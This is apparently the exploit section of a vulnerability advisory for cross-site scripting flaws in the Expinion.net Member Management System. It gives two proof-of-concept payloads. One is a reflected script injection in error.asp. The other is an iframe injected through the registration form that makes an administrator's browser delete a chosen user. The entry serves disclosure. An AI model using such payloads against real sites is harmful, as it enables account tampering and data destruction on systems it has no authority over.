• info
• discussion
• exploit
• solution
• references

Expinion.net Member Management System Multiple Cross-Site Scripting Vulnerabilities

No exploit is required.

The following proof of concept has been provided:
http://www.example.com/error.asp?err=">[XSS]
In the register form: "><iframe src=http://www.example.com/admin/user_del.asp?ID=[ID to delete]>